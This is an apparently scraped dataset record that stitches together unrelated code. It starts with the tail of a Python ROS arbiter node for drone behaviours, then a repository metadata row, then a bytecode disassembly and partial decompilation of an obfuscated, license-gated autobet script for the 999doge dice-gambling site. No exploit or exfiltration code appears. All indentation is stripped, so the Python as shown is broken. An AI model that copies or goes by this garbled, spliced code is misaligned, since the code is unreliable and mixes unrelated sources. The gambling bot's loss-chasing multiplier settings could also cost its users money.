pos_pid = transformers.PIDPosController(self.tf, self.ddynrec, alt_pid)
print pos_pid.cmd_pos
self.transformers = {
'cmd_vel': (Twist, transformers.cmd_vel),
'cmd_takeoff': (Empty, transformers.cmd_takeoff),
'cmd_land': (Empty, transformers.cmd_land),
'cmd_pos': (PoseStamped, pos_pid.cmd_pos),
'cmd_vel_alt': (VelAlt, alt_pid.cmd_vel_alt)
}
""":type : dict[str, (str, (Any) -> transformers.Command)]"""
# Subscribe to the behaviors passed as ROS parameters
starting_behaviors = rospy.get_param('~behaviors', [])
for b in starting_behaviors:
behavior = Behavior(self.process_command, b, freq=20)
behavior.subscribe(self.transformers)
self.behaviors[b] = behavior
# Secondary behaviors are filters that are always active on the Command before it is published.
# Examples include last-minute obstacle avoidance, speed limiters, or arena boundary constraints.
self.secondaries = []
self.vel_pub = rospy.Publisher('/cmd_vel', Twist, queue_size=0)
self.takeoff_pub = rospy.Publisher('/takeoff', Empty, queue_size=0)
self.land_pub = rospy.Publisher('/land', Empty, queue_size=0)
self.debug_pub = rospy.Publisher('/arbiter/debug', String, queue_size=10)
self.active_pub = rospy.Publisher('/arbiter/active_behavior', String, queue_size=10)
self.ddynrec.add_variable("midbrain_freq", "Frequency of the main control loop for PIDs",
rospy.get_param('~midbrain_freq', 100), 1, 1000)
self.start_ddynrec()
self.null_behavior.handle_message('cmd_vel', Twist())
rospy.sleep(0.5)
rospy.Subscriber('/arbiter/register', RegisterBehavior, self.handle_register)
rospy.Subscriber('/arbiter/activate_behavior', String, self.handle_activate)
def start_ddynrec(self):
"""
Helper function to start the ddynamic reconfigure server with a callback
function that updates the self.ddynrec attribute.
"""
def callback(config, level):
"""
A callback function used to as the parameter in the ddynrec.start() function.
This custom callback function updates the state of self.ddynrec so we can
refer to its variables whenever we have access to it.
"""
rospy.loginfo("Received reconf call: " + str(config))
# Update all variables
var_names = self.ddynrec.get_variable_names()
for var_name in var_names:
self.ddynrec.__dict__[var_name] = config[var_name]
return config
self.ddynrec.start(callback)
def handle_activate(self, msg):
"""
ROS subscriber for the activate_behavior topic
:type msg: String
"""
self.set_active_behavior(msg.data)
def set_active_behavior(self, name):
"""
Sets the active behavior, if the provided name is one of the known behaviors.
:type name: str
"""
if name not in self.behaviors:
# TODO: consider automatically registering new behaviors
rospy.logerr('{} does not exist as a behavior!'.format(name))
self.set_active_behavior('zero')
if name != self.active_behavior_name:
self.active_behavior_name = name
# Stop the vehicle
self.process_command(name, 'cmd_vel', Twist())
rospy.loginfo_throttle(1.0, '{} selected as active behavior'.format(name))
def handle_register(self, req):
"""
ROS subscriber for adding a new behavior to the system.
It is recommended to publish a single latched message to this behavior when a behavior
node starts.
:type req: RegisterBehavior
"""
if req.name in self.behaviors:
rospy.logwarn("Behavior {} already exists".format(req.name))
old = self.behaviors[req.name]
old.stop()
if not req.name:
rospy.logerr("Behavior cannot be created with empty name")
return
behavior = Behavior(self.process_command, req.name, freq=self.ddynrec.midbrain_freq if req.fast else 0)
behavior.subscribe(self.transformers)
self.behaviors[req.name] = behavior
rospy.loginfo("Created behavior {}".format(behavior))
def process_command(self, behavior, topic, raw_cmd):
"""
process_command gets called after a message gets received from the currently active behavior.
:param str behavior: The name of the behavior initiating the command
:param str topic: The topic (without namespace) to which the command was sent
:type raw_cmd: ROS message
:return: success
"""
if behavior != self.active_behavior_name:
# Only messages from the active behavior are handled
return False
_, transformer = self.transformers[topic]
# Convert to a transformers.Command
cmd = transformer(raw_cmd) # type: transformers.Command
# Apply secondary behaviors
for func in self.secondaries:
cmd = func(cmd)
# Publish the result to the ROS network
if cmd.takeoff:
self.takeoff_pub.publish(Empty())
vel = Twist()
vel.linear.z = 0.5
self.vel_pub.publish(vel)
elif cmd.land:
self.land_pub.publish(Empty())
vel = Twist()
vel.linear.z = -0.5
self.vel_pub.publish(vel)
else:
self.vel_pub.publish(cmd.vel)
# Log it
self.active_pub.publish(String(behavior))
rospy.loginfo_throttle(1, "Command published by {}/{}".format(behavior, topic))
return True
def publish_debug(self):
"""
Publishes debug information to the ROS network
:return: None
"""
self.debug_pub.publish(String(str(self.behaviors)))
def run(self):
"""
Main method, publishes debug information and
:return:
"""
r = rospy.Rate(20)
while not rospy.is_shutdown():
self.publish_debug()
try:
r.sleep()
except rospy.ROSTimeMovedBackwardsException:
r = rospy.Rate(20)
class Behavior:
def __init__(self, callback, name, freq=0):
"""
:param (str, str, Any)->bool callback: The function to be called when this behavior receives a command
:param name: The name used to refer to this elsewhere in ROS
:param int freq: The frequency at which to automatically publish.
If 0, publishes immediately on message reception.
"""
self.name = name
self.callback = callback
self.subscribers = dict() # type: dict[str, rospy.Subscriber]
self.last_msg_time = rospy.Time(0)
self.last_msg_topic = ''
self.last_msg = None
self.auto_publish = (freq != 0)
if self.auto_publish:
def target():
r = rospy.Rate(freq)
while not rospy.is_shutdown() and self.auto_publish:
r.sleep()
if self.last_msg_topic and self.last_msg:
self.callback(self.name, self.last_msg_topic, self.last_msg)
self.thread = Thread(target=target)
self.thread.daemon = True
self.thread.start()
else:
self.thread = None
def stop(self):
"""
Gracefully shuts down the threads and subscribers associated with this behavior
:return: None
"""
self.auto_publish = False
for sub in self.subscribers.itervalues():
sub.unregister()
def handle_message(self, topic, msg):
"""
Processes an incoming message from the namespace of this behavior, ultimately calling the
callback function provided when this behavior was created.
:param str topic: The topic (without namespace) to which the message was sent
:param msg: The message (various ROS message types)
:return: None
"""
self.last_msg_time = rospy.Time.now()
self.last_msg_topic = topic
self.last_msg = msg
# if not self.auto_publish:
self.callback(self.name, topic, msg)
def subscribe(self, topics):
"""
Subscribes to the topics specified by transformers from the namespace.
:param topics: map{topic name : (Type, Transformer)
:type topics: dict[str, (str, (Any) -> transformers.Command)]
:return:
"""
for (topic, (msg_type, _)) in topics.iteritems():
# The selftopic=topic part makes a copy of the topic variable, so it doesn't get changed before
# the callback is called.
# https://stackoverflow.com/a/235764
def callback(msg, selftopic=topic):
self.handle_message(selftopic, msg)
sub = rospy.Subscriber("/{}/{}".format(self.name, topic), msg_type, callback)
self.subscribers[topic] = sub
rospy.loginfo("Subscribed to /{}/{}".format(self.name, topic))
def __str__(self):
return 'Behavior[{}]'.format(self.name)
__repr__ = __str__
if __name__ == '__main__':
rospy.init_node('arbiter')
Arbiter().run()
| [
"eric@legoaces.org"
] | eric@legoaces.org |
6c3f3138f5a174c373d308b7a48067eb2479d0e0 | c208954de92470c0144fad2e07a92ed1822edd59 | /selenia/out_dis.py | 183b10d388d465444ad227f3c3a25273230c321e | [
"MIT"
] | permissive | rendy026/reverse-enginnering | 4217f3b723569fb792bac0f22a56a305199db1dc | f04cec0bf518a2617fc4fd7155f755fafc2af799 | refs/heads/master | 2023-01-07T15:49:15.791052 | 2020-10-13T09:22:02 | 2020-10-13T09:22:02 | 303,575,571 | 0 | 0 | MIT | 2020-10-13T09:41:59 | 2020-10-13T03:17:42 | Python | UTF-8 | Python | false | false | 67,675 | py | # FileNames : <EzzKun>
# Python Bytecode : 3.8.5
# Selector <module> In Line 1 file out.pyc
# Timestamp In Code : (2020-09-18 18:10:25)
# Method Name: <module>
# Filename: <EzzKun>
# Argument count: 0
# Kw-only arguments: 0
# Number of locals: 0
# Stack size: 10
# Flags: 0x00000040 (NOFREE)
# First Line: 1
# Constants:
# 0: 0
# 1: None
# 2: ('datetime',)
# 3: ('*',)
# 4: 'Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4 Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/79.0.3945.93 Mobile Safari/537.36'
# 5: 'application/x-www-form-urlencoded'
# 6: '/'
# 7: 'com.reland.relandicebot'
# 8: 'cross-site'
# 9: 'cors'
# 10: 'gzip, deflate'
# 11: 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'
# 12: 'lang=id'
# 13: ('user-agent', 'content-type', 'accept', 'x-requested-with', 'sec-fetch-site', 'sec-fetch-mode', 'accept-encoding', 'accept-language', 'cookie')
# 14: 'https://www.999doge.com/api/web.aspx'
# 15: '\x1b[0;34m'
# 16: '\x1b[0m'
# 17: '\x1b[1;33m'
# 18: '\x1b[1;32m'
# 19: '\x1b[1;31m'
# 20: '\x1b[0;36m'
# 21: '\x1b[1;35m'
# 22: '\x1b[5;37;42m'
# 23: '\x1b[5;37;41m'
# 24: '{:.8f}'
# 25: '{:0>1.0f}'
# 26: 'Username'
# 27: 'Password'
# 28: 'BaseTrade'
# 29: 'C1'
# 30: 'C2'
# 31: 'TradeCount_1'
# 32: 'TradeCount_2'
# 33: 200
# 34: 'Number Of Trade Out of Limit'
# 35: 'MultiplyOnWin'
# 36: '0'
# 37: 1
# 38: 'MultiplyOnLose'
# 39: 'MaxBaseTrade'
# 40: 'Toogle'
# 41: 'ON'
# 42: 'Max'
# 43: 100000000
# 44: 'ResetOnLoseMaxTrade'
# 45: 'StopOnLoseMaxTrade'
# 46: 'OFF'
# 47: 'ForceTC1AfterLose'
# 48: 'ChangeTCAfterLose'
# 49: 'TargetProfit'
# 50: 'ClientSeed'
# 51: 'RecoveryMultiplier'
# 52: 'RecoveryIncrease'
# 53: 'AddDelayTrade'
# 54: 'AddDelayTradeWin'
# 55: 'AddDelayTradeLose'
# 56: 'StopLoseBalance'
# 57: 'ContinueLastBase'
# 58: 'SmartRecovery'
# 59: -999999999999999999999999999
# 60: -100000000
# 61: 'doge'
# 62: 'Offline'
# 63: <code object withdraw at 0xa8bab020, file "<EzzKun>", line 86>
# 64: 'withdraw'
# 65: <code object harga_license at 0xa8a88f28, file "<EzzKun>", line 107>
# 66: 'harga_license'
# 67: <code object post at 0xa8a03020, file "<EzzKun>", line 121>
# 68: 'post'
# 69: <code object login at 0xa89fff90, file "<EzzKun>", line 125>
# 70: 'login'
# 71: <code object autobet at 0xa89fff28, file "<EzzKun>", line 171>
# 72: 'autobet'
# 73: <code object ainfo at 0xa89ffec0, file "<EzzKun>", line 347>
# 74: 'ainfo'
# 75: <code object verify at 0xa89ffe58, file "<EzzKun>", line 373>
# 76: 'verify'
# 77: <code object register at 0xa89ffc50, file "<EzzKun>", line 382>
# 78: 'register'
# 79: <code object check_license at 0xa89ff9e0, file "<EzzKun>", line 434>
# 80: 'check_license'
# 81: <code object check_license_platinum at 0xa89ff8a8, file "<EzzKun>", line 482>
# 82: 'check_license_platinum'
# 83: <code object gblnc at 0xa89ff840, file "<EzzKun>", line 522>
# 84: 'gblnc'
# 85: 'clear'
# 86: 'https://layscape.xyz/selenia/info.php'
# 87: 'Server Status Code ['
# 88: ']'
# 89: 'Alive'
# 90: 'versi'
# 91: 'Server Down Try Again or Check Latest Version Script'
# 92: 'ERROR CONNECTION TRY AGAIN'
# 93: 'a=GetBalance&s='
# 94: '&Currency=doge'
# 95: 'Balance'
# 96: '\x1b[1;31m====================================================\x1b[0m'
# 97: '\x1b[1;32m[+]\x1b[0m \x1b[0;36mDO WITH YOUR OWN RISK \x1b[0m \x1b[1;32m[+]\x1b[0m'
# 98: '\x1b[1;32m[+]\x1b[0m \x1b[1;33mCreator : Layscape\x1b[0m \x1b[1;32m[+]\x1b[0m'
# 99: '\x1b[1;32m[+]\x1b[0m \x1b[1;33mVersi Script V3.0\x1b[0m \x1b[1;32m[+]\x1b[0m'
# 100: '\x1b[1;32m[+]\x1b[0m \x1b[1;33mJoin Group Whatsapp For News and Update\x1b[0m \x1b[1;32m[+]\x1b[0m'
# 101: "Disclaimer : \nScript Not Working Don't Blame Creator :). \nRead/Watch How to Use As Well"
# 102: 'Info :'
# 103: 'notice5'
# 104: 'Information Script :'
# 105: 'Versi :'
# 106: 'Creator :'
# 107: 'created'
# 108: 'Youtube :'
# 109: 'youtube'
# 110: 'Script :'
# 111: 'script'
# 112: '3.0'
# 113: 'New Version'
# 114: 'New Version '
# 115: ' Release'
# 116: 'Please Update'
# 117: 'Type This Command:\n- git stash\n- git pull'
# 118: 'Notice :\n'
# 119: 'notice1'
# 120: 'notice2'
# 121: 'notice3'
# 122: 'notice4'
# 123: '- Attention to Your Connection'
# 124: 'Buy License Here : \nhttps://layscape.xyz/selenia/license'
# 125: ''
# 126: 'Online'
# 127: 'Re-Login for Refresh'
# 128: 'License Out of Date'
# 129: 'Buy New One'
# 130: 'Informasi Status Login :'
# 131: 'Account ID :'
# 132: 'Username :'
# 133: 'Doge Balance :'
# 134: 'Doge Deposit Wallet :'
# 135: 'License Type : '
# 136: 'Free License'
# 137: 'Expired Date : None'
# 138: 'SG Server Status :'
# 139: 'Max Balance : 150 DOGE'
# 140: 'Premium License'
# 141: 'Platinum License'
# 142: 'Date :'
# 143: '%Y-%m-%d'
# 144: 'Expired Date :'
# 145: 'Expired In :'
# 146: 'Days'
# 147: 'Max Balance : Unlimited'
# 148: 'Currency Available : DOGE'
# 149: 'Information Status Login :'
# 150: '\nPilih Menu :'
# 151: '1. Login Premium License'
# 152: '2. Login For Free'
# 153: '3. Login Platinum License'
# 154: '4. Register Account SELENIA'
# 155: '5. Price List License'
# 156: '0. Keluar'
# 157: '6. Start Trade'
# 158: '7. Withdraw'
# 159: '8. Account Information'
# 160: '==>'
# 161: '1'
# 162: '2'
# 163: '3'
# 164: '4'
# 165: '6'
# 166: '5'
# 167: '7'
# 168: '8'
# 169: 'NO MENU SELECTED'
# 170: (0,)
# Names:
# 0: cloudscraper
# 1: sys
# 2: os
# 3: time
# 4: random
# 5: requests
# 6: datetime
# 7: config
# 8: headers
# 9: create_scraper
# 10: scr
# 11: url
# 12: birutua
# 13: putih
# 14: kuning
# 15: hijau
# 16: merah
# 17: biru
# 18: ungu
# 19: bghijau_white
# 20: bgmerah_black
# 21: format
# 22: num_format
# 23: num_PayIn
# 24: account
# 25: Username
# 26: Password
# 27: float
# 28: tradeset
# 29: BaseTrade
# 30: C1
# 31: C2
# 32: int
# 33: TC1
# 34: TC2
# 35: print
# 36: exit
# 37: str
# 38: IncreaseOnWinPercent
# 39: ResetOnWin
# 40: IncreaseOnLosePercent
# 41: ResetOnLose
# 42: MaxBase
# 43: MaxBaseTrade
# 44: ResetOnLoseMaxTrade
# 45: StopOnLoseMaxTrade
# 46: tools
# 47: ForceTC1AfterLose
# 48: ChangeTCAfterLose
# 49: TargetProfit
# 50: ClientSeed
# 51: RecoveryMultiplier
# 52: RecoveryIncrease
# 53: AddDelayTrade
# 54: AddDelayTradeWin
# 55: AddDelayTradeLose
# 56: StopLoseBalance
# 57: ContinueLastBase
# 58: SmartRecovery
# 59: Currency
# 60: statslogin
# 61: limit
# 62: withdraw
# 63: harga_license
# 64: post
# 65: login
# 66: autobet
# 67: ainfo
# 68: verify
# 69: register
# 70: check_license
# 71: check_license_platinum
# 72: gblnc
# 73: system
# 74: get
# 75: srv
# 76: status_code
# 77: status
# 78: json
# 79: info
# 80: version
# 81: Exception
# 82: e
# 83: ses
# 84: getbalance
# 85: req
# 86: dogebalance
# 87: sleep
# 88: Expired
# 89: accid
# 90: dogewallet
# 91: logintype
# 92: statssrv
# 93: now
# 94: mydatetime
# 95: strftime
# 96: userdate
# 97: input
# 98: smenu
1 0 LOAD_CONST 0 (0)
2 LOAD_CONST 1 (None)
4 IMPORT_NAME 0 (cloudscraper)
6 STORE_NAME 0 (cloudscraper)
8 LOAD_CONST 0 (0)
10 LOAD_CONST 1 (None)
12 IMPORT_NAME 1 (sys)
14 STORE_NAME 1 (sys)
16 LOAD_CONST 0 (0)
18 LOAD_CONST 1 (None)
20 IMPORT_NAME 2 (os)
22 STORE_NAME 2 (os)
24 LOAD_CONST 0 (0)
26 LOAD_CONST 1 (None)
28 IMPORT_NAME 3 (time)
30 STORE_NAME 3 (time)
32 LOAD_CONST 0 (0)
34 LOAD_CONST 1 (None)
36 IMPORT_NAME 4 (random)
38 STORE_NAME 4 (random)
40 LOAD_CONST 0 (0)
42 LOAD_CONST 1 (None)
44 IMPORT_NAME 5 (requests)
46 STORE_NAME 5 (requests)
2 48 LOAD_CONST 0 (0)
50 LOAD_CONST 2 (('datetime',))
52 IMPORT_NAME 6 (datetime)
54 IMPORT_FROM 6 (datetime)
56 STORE_NAME 6 (datetime)
58 POP_TOP
3 60 LOAD_CONST 0 (0)
62 LOAD_CONST 3 (('*',))
64 IMPORT_NAME 7 (config)
66 IMPORT_STAR
5 68 LOAD_CONST 4 ('Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4 Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/79.0.3945.93 Mobile Safari/537.36')
6 70 LOAD_CONST 5 ('application/x-www-form-urlencoded')
7 72 LOAD_CONST 6 ('/')
8 74 LOAD_CONST 7 ('com.reland.relandicebot')
9 76 LOAD_CONST 8 ('cross-site')
10 78 LOAD_CONST 9 ('cors')
11 80 LOAD_CONST 10 ('gzip, deflate')
12 82 LOAD_CONST 11 ('id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7')
13 84 LOAD_CONST 12 ('lang=id')
4 86 LOAD_CONST 13 (('user-agent', 'content-type', 'accept', 'x-requested-with', 'sec-fetch-site', 'sec-fetch-mode', 'accept-encoding', 'accept-language', 'cookie'))
88 BUILD_CONST_KEY_MAP 9
90 STORE_NAME 8 (headers)
15 92 LOAD_NAME 0 (cloudscraper)
94 LOAD_METHOD 9 (create_scraper)
96 CALL_METHOD 0
98 STORE_NAME 10 (scr)
16 100 LOAD_CONST 14 ('https://www.999doge.com/api/web.aspx')
102 STORE_NAME 11 (url)
17 104 LOAD_CONST 15 ('\x1b[0;34m')
106 STORE_NAME 12 (birutua)
18 108 LOAD_CONST 16 ('\x1b[0m')
110 STORE_NAME 13 (putih)
19 112 LOAD_CONST 17 ('\x1b[1;33m')
114 STORE_NAME 14 (kuning)
20 116 LOAD_CONST 18 ('\x1b[1;32m')
118 STORE_NAME 15 (hijau)
21 120 LOAD_CONST 19 ('\x1b[1;31m')
122 STORE_NAME 16 (merah)
22 124 LOAD_CONST 20 ('\x1b[0;36m')
126 STORE_NAME 17 (biru)
23 128 LOAD_CONST 21 ('\x1b[1;35m')
130 STORE_NAME 18 (ungu)
24 132 LOAD_CONST 22 ('\x1b[5;37;42m')
134 STORE_NAME 19 (bghijau_white)
25 136 LOAD_CONST 23 ('\x1b[5;37;41m')
138 STORE_NAME 20 (bgmerah_black)
26 140 LOAD_CONST 24 ('{:.8f}')
142 LOAD_ATTR 21 (format)
144 STORE_NAME 22 (num_format)
27 146 LOAD_CONST 25 ('{:0>1.0f}')
148 LOAD_ATTR 21 (format)
150 STORE_NAME 23 (num_PayIn)
28 152 LOAD_NAME 24 (account)
154 LOAD_CONST 26 ('Username')
156 BINARY_SUBSCR
158 STORE_NAME 25 (Username)
29 160 LOAD_NAME 24 (account)
162 LOAD_CONST 27 ('Password')
164 BINARY_SUBSCR
166 STORE_NAME 26 (Password)
31 168 LOAD_NAME 27 (float)
170 LOAD_NAME 28 (tradeset)
172 LOAD_CONST 28 ('BaseTrade')
174 BINARY_SUBSCR
176 CALL_FUNCTION 1
178 STORE_GLOBAL 29 (BaseTrade)
32 180 LOAD_NAME 27 (float)
182 LOAD_NAME 28 (tradeset)
184 LOAD_CONST 29 ('C1')
186 BINARY_SUBSCR
188 CALL_FUNCTION 1
190 STORE_NAME 30 (C1)
33 192 LOAD_NAME 27 (float)
194 LOAD_NAME 28 (tradeset)
196 LOAD_CONST 30 ('C2')
198 BINARY_SUBSCR
200 CALL_FUNCTION 1
202 STORE_NAME 31 (C2)
34 204 LOAD_NAME 32 (int)
206 LOAD_NAME 28 (tradeset)
208 LOAD_CONST 31 ('TradeCount_1')
210 BINARY_SUBSCR
212 CALL_FUNCTION 1
214 STORE_NAME 33 (TC1)
35 216 LOAD_NAME 32 (int)
218 LOAD_NAME 28 (tradeset)
220 LOAD_CONST 32 ('TradeCount_2')
222 BINARY_SUBSCR
224 CALL_FUNCTION 1
226 STORE_NAME 34 (TC2)
36 228 LOAD_NAME 33 (TC1)
230 LOAD_CONST 33 (200)
232 COMPARE_OP 4 (>)
234 POP_JUMP_IF_TRUE 246
236 LOAD_NAME 34 (TC2)
238 LOAD_CONST 33 (200)
240 COMPARE_OP 4 (>)
242 EXTENDED_ARG 1
244 POP_JUMP_IF_FALSE 262
37 >> 246 LOAD_NAME 35 (print)
248 LOAD_CONST 34 ('Number Of Trade Out of Limit')
250 CALL_FUNCTION 1
252 POP_TOP
38 254 LOAD_NAME 1 (sys)
256 LOAD_METHOD 36 (exit)
258 CALL_METHOD 0
260 POP_TOP
39 >> 262 LOAD_NAME 37 (str)
264 LOAD_NAME 28 (tradeset)
266 LOAD_CONST 35 ('MultiplyOnWin')
268 BINARY_SUBSCR
270 CALL_FUNCTION 1
272 STORE_NAME 38 (IncreaseOnWinPercent)
40 274 LOAD_NAME 38 (IncreaseOnWinPercent)
276 LOAD_CONST 36 ('0')
278 COMPARE_OP 2 (==)
280 EXTENDED_ARG 1
282 POP_JUMP_IF_FALSE 290
41 284 LOAD_CONST 37 (1)
286 STORE_NAME 39 (ResetOnWin)
288 JUMP_FORWARD 4 (to 294)
43 >> 290 LOAD_CONST 0 (0)
292 STORE_NAME 39 (ResetOnWin)
44 >> 294 LOAD_NAME 37 (str)
296 LOAD_NAME 28 (tradeset)
298 LOAD_CONST 38 ('MultiplyOnLose')
300 BINARY_SUBSCR
302 CALL_FUNCTION 1
304 STORE_NAME 40 (IncreaseOnLosePercent)
45 306 LOAD_NAME 40 (IncreaseOnLosePercent)
308 LOAD_CONST 36 ('0')
310 COMPARE_OP 2 (==)
312 EXTENDED_ARG 1
314 POP_JUMP_IF_FALSE 322
46 316 LOAD_CONST 37 (1)
318 STORE_NAME 41 (ResetOnLose)
320 JUMP_FORWARD 4 (to 326)
48 >> 322 LOAD_CONST 0 (0)
324 STORE_NAME 41 (ResetOnLose)
49 >> 326 LOAD_NAME 28 (tradeset)
328 LOAD_CONST 39 ('MaxBaseTrade')
330 BINARY_SUBSCR
332 LOAD_CONST 40 ('Toogle')
334 BINARY_SUBSCR
336 STORE_NAME 42 (MaxBase)
50 338 LOAD_NAME 42 (MaxBase)
340 LOAD_CONST 41 ('ON')
342 COMPARE_OP 2 (==)
344 EXTENDED_ARG 1
346 POP_JUMP_IF_FALSE 426
51 348 LOAD_NAME 27 (float)
350 LOAD_NAME 28 (tradeset)
352 LOAD_CONST 39 ('MaxBaseTrade')
354 BINARY_SUBSCR
356 LOAD_CONST 42 ('Max')
358 BINARY_SUBSCR
360 CALL_FUNCTION 1
362 LOAD_CONST 43 (100000000)
364 BINARY_MULTIPLY
366 STORE_GLOBAL 43 (MaxBaseTrade)
52 368 LOAD_NAME 28 (tradeset)
370 LOAD_CONST 39 ('MaxBaseTrade')
372 BINARY_SUBSCR
374 LOAD_CONST 44 ('ResetOnLoseMaxTrade')
376 BINARY_SUBSCR
378 LOAD_CONST 41 ('ON')
380 COMPARE_OP 2 (==)
382 EXTENDED_ARG 1
384 POP_JUMP_IF_FALSE 392
53 386 LOAD_CONST 37 (1)
388 STORE_NAME 44 (ResetOnLoseMaxTrade)
390 JUMP_FORWARD 4 (to 396)
55 >> 392 LOAD_CONST 0 (0)
394 STORE_NAME 44 (ResetOnLoseMaxTrade)
56 >> 396 LOAD_NAME 28 (tradeset)
398 LOAD_CONST 39 ('MaxBaseTrade')
400 BINARY_SUBSCR
402 LOAD_CONST 45 ('StopOnLoseMaxTrade')
404 BINARY_SUBSCR
406 LOAD_CONST 41 ('ON')
408 COMPARE_OP 2 (==)
410 EXTENDED_ARG 1
412 POP_JUMP_IF_FALSE 420
57 414 LOAD_CONST 37 (1)
416 STORE_NAME 45 (StopOnLoseMaxTrade)
418 JUMP_FORWARD 4 (to 424)
59 >> 420 LOAD_CONST 0 (0)
422 STORE_NAME 45 (StopOnLoseMaxTrade)
>> 424 JUMP_FORWARD 22 (to 448)
60 >> 426 LOAD_NAME 42 (MaxBase)
428 LOAD_CONST 46 ('OFF')
430 COMPARE_OP 2 (==)
432 EXTENDED_ARG 1
434 POP_JUMP_IF_FALSE 448
61 436 LOAD_CONST 0 (0)
438 STORE_GLOBAL 43 (MaxBaseTrade)
62 440 LOAD_CONST 0 (0)
442 STORE_NAME 44 (ResetOnLoseMaxTrade)
63 444 LOAD_CONST 0 (0)
446 STORE_NAME 45 (StopOnLoseMaxTrade)
66 >> 448 LOAD_NAME 46 (tools)
450 LOAD_CONST 47 ('ForceTC1AfterLose')
452 BINARY_SUBSCR
454 STORE_NAME 47 (ForceTC1AfterLose)
67 456 LOAD_NAME 46 (tools)
458 LOAD_CONST 48 ('ChangeTCAfterLose')
460 BINARY_SUBSCR
462 LOAD_CONST 40 ('Toogle')
464 BINARY_SUBSCR
466 STORE_NAME 48 (ChangeTCAfterLose)
68 468 LOAD_NAME 27 (float)
470 LOAD_NAME 46 (tools)
472 LOAD_CONST 49 ('TargetProfit')
474 BINARY_SUBSCR
476 CALL_FUNCTION 1
478 STORE_NAME 49 (TargetProfit)
69 480 LOAD_NAME 32 (int)
482 LOAD_NAME 28 (tradeset)
484 LOAD_CONST 50 ('ClientSeed')
486 BINARY_SUBSCR
488 CALL_FUNCTION 1
490 STORE_NAME 50 (ClientSeed)
70 492 LOAD_NAME 27 (float)
494 LOAD_NAME 46 (tools)
496 LOAD_CONST 51 ('RecoveryMultiplier')
498 BINARY_SUBSCR
500 CALL_FUNCTION 1
502 STORE_NAME 51 (RecoveryMultiplier)
71 504 LOAD_NAME 27 (float)
506 LOAD_NAME 46 (tools)
508 LOAD_CONST 52 ('RecoveryIncrease')
510 BINARY_SUBSCR
512 CALL_FUNCTION 1
514 STORE_NAME 52 (RecoveryIncrease)
72 516 LOAD_NAME 27 (float)
518 LOAD_NAME 46 (tools)
520 LOAD_CONST 53 ('AddDelayTrade')
522 BINARY_SUBSCR
524 CALL_FUNCTION 1
526 STORE_NAME 53 (AddDelayTrade)
73 528 LOAD_NAME 27 (float)
530 LOAD_NAME 46 (tools)
532 LOAD_CONST 54 ('AddDelayTradeWin')
534 BINARY_SUBSCR
536 CALL_FUNCTION 1
538 STORE_NAME 54 (AddDelayTradeWin)
74 540 LOAD_NAME 27 (float)
542 LOAD_NAME 46 (tools)
544 LOAD_CONST 55 ('AddDelayTradeLose')
546 BINARY_SUBSCR
548 CALL_FUNCTION 1
550 STORE_NAME 55 (AddDelayTradeLose)
75 552 LOAD_NAME 27 (float)
554 LOAD_NAME 46 (tools)
556 LOAD_CONST 56 ('StopLoseBalance')
558 BINARY_SUBSCR
560 CALL_FUNCTION 1
562 STORE_NAME 56 (StopLoseBalance)
76 564 LOAD_NAME 46 (tools)
566 LOAD_CONST 57 ('ContinueLastBase')
568 BINARY_SUBSCR
570 STORE_GLOBAL 57 (ContinueLastBase)
77 572 LOAD_NAME 46 (tools)
574 LOAD_CONST 58 ('SmartRecovery')
576 BINARY_SUBSCR
578 STORE_NAME 58 (SmartRecovery)
import cloudscraper, sys, os, time, random, requests
from datetime import datetime
from config import *
headers = {'user-agent':'Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4 Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/79.0.3945.93 Mobile Safari/537.36',
'content-type':'application/x-www-form-urlencoded',
'accept':'/',
'x-requested-with':'com.reland.relandicebot',
'sec-fetch-site':'cross-site',
'sec-fetch-mode':'cors',
'accept-encoding':'gzip, deflate',
'accept-language':'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7',
'cookie':'lang=id'}
scr = cloudscraper.create_scraper()
url = 'https://www.999doge.com/api/web.aspx'
birutua = '\x1b[0;34m'
putih = '\x1b[0m'
kuning = '\x1b[1;33m'
hijau = '\x1b[1;32m'
merah = '\x1b[1;31m'
biru = '\x1b[0;36m'
ungu = '\x1b[1;35m'
bghijau_white = '\x1b[5;37;42m'
bgmerah_black = '\x1b[5;37;41m'
num_format = '{:.8f}'.format
num_PayIn = '{:0>1.0f}'.format
Username = account['Username']
Password = account['Password']
BaseTrade = float(tradeset['BaseTrade'])
C1 = float(tradeset['C1'])
C2 = float(tradeset['C2'])
TC1 = int(tradeset['TradeCount_1'])
TC2 = int(tradeset['TradeCount_2'])
if TC1 > 200 or (TC2 > 200):
print('Number Of Trade Out of Limit')
sys.exit()
IncreaseOnWinPercent = str(tradeset['MultiplyOnWin'])
if IncreaseOnWinPercent == '0':
ResetOnWin = 1
else:
ResetOnWin = 0
IncreaseOnLosePercent = str(tradeset['MultiplyOnLose'])
if IncreaseOnLosePercent == '0':
ResetOnLose = 1
else:
ResetOnLose = 0
MaxBase = tradeset['MaxBaseTrade']['Toogle']
if MaxBase == 'ON':
MaxBaseTrade = float(tradeset['MaxBaseTrade']['Max']) * 100000000
if tradeset['MaxBaseTrade']['ResetOnLoseMaxTrade'] == 'ON':
ResetOnLoseMaxTrade = 1
else:
ResetOnLoseMaxTrade = 0
if tradeset['MaxBaseTrade']['StopOnLoseMaxTrade'] == 'ON':
StopOnLoseMaxTrade = 1
else:
StopOnLoseMaxTrade = 0
elif MaxBase == 'OFF':
MaxBaseTrade = 0
ResetOnLoseMaxTrade = 0
StopOnLoseMaxTrade = 0
ForceTC1AfterLose = tools['ForceTC1AfterLose']
ChangeTCAfterLose = tools['ChangeTCAfterLose']['Toogle']
TargetProfit = float(tools['TargetProfit'])
ClientSeed = int(tradeset['ClientSeed'])
RecoveryMultiplier = float(tools['RecoveryMultiplier'])
RecoveryIncrease = float(tools['RecoveryIncrease'])
AddDelayTrade = float(tools['AddDelayTrade'])
AddDelayTradeWin = float(tools['AddDelayTradeWin'])
AddDelayTradeLose = float(tools['AddDelayTradeLose'])
StopLoseBalance = float(tools['StopLoseBalance'])
ContinueLastBase = tools['ContinueLastBase']
SmartRecovery = tools['SmartRecovery']
